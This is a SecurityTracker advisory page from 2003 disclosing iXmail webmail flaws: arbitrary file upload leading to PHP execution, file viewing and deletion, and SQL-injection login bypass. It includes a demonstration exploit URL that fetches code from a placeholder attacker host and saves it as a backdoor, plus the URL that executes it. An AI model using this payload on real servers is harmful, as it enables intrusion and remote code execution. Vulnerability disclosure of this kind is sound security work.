SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Join our Affiliate Program
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (E-mail Server)  >  iXmail Vendors:  a-suivre.net
iXmail Bugs Let Remote Users Login, View and Delete Files, and Execute Arbitrary Commands on the System
SecurityTracker Alert ID:  1007054
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 24 2003
Impact:  Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): 0.2 beta, 0.3
Description:  Several vulnerabilities were reported in the iXmail web mail system. A remote user can upload files to the server and execute them. A remote user can also view or delete certain files on the server and inject SQL commands to gain authenticated access to the application.

Frog-m@n reported that a remote authenticated user can supply specially crafted '$attach1' and '$attach1_name' variables to the 'xmail_attach.php' script to upload arbitrary files to the system, including PHP files. A demonstration exploit URL is provided:

http://[target]/ixmail_attach.php?submit=1&attach1=http: //[attacker]/badcode.txt&attach1_name=backdoor.php

In the above example, the 'badcode.txt' file will be written to the 'tmp' directory in the web document directory as the 'backdoor.php' file. The PHP code in 'backdoor.php' can then be executed (with the privileges of the web server) with the following type of URL:

http://[target]/tmp/backdoor.php

A remote authenticated user can also "upload" files that actually reside on the target server. In this manner, a local user can copy files in the installation directory (such as 'include/ixmail_config.inc.php') to the 'tmp' directory in the web document directory. This allows a local user to view ixmail configuration information, according to the report.

A vulnerability was reported in the 'ixmail_netattach.php' script. The script allows a remote authenticated user to delete certain files, such as scripts on the server.

An authentication vulnerability was reported in 'index.php'. If 'magic_quotes_gpc' is configured to be 'off' in the 'php.ini' configuration file, then a remote user can submit a specially crafted request to inject SQL commands to become authenticated on the application.
Impact:  A remote user can gain access to the application without authenticating.

A remote authenticated user can upload PHP code to the system and then execute the code with the privileges of the web server.

A remote authenticated user can delete files from the installation directory.

A remote authenticated user can view files in the installation directory.
Solution:  The vendor has released a fixed version (0.3 beta), available at:

http://www.a-suivre.net/ixmail/index2.php?page=download
Vendor URL:  www.a-suivre.net/ixmail/index2.php (Links to External Site)
Cause:  Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Tue, 24 Jun 2003 13:16:04 -0400
Subject:  iXmail

 

http://www.frog-man.org/tutos/iXmail.txt


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC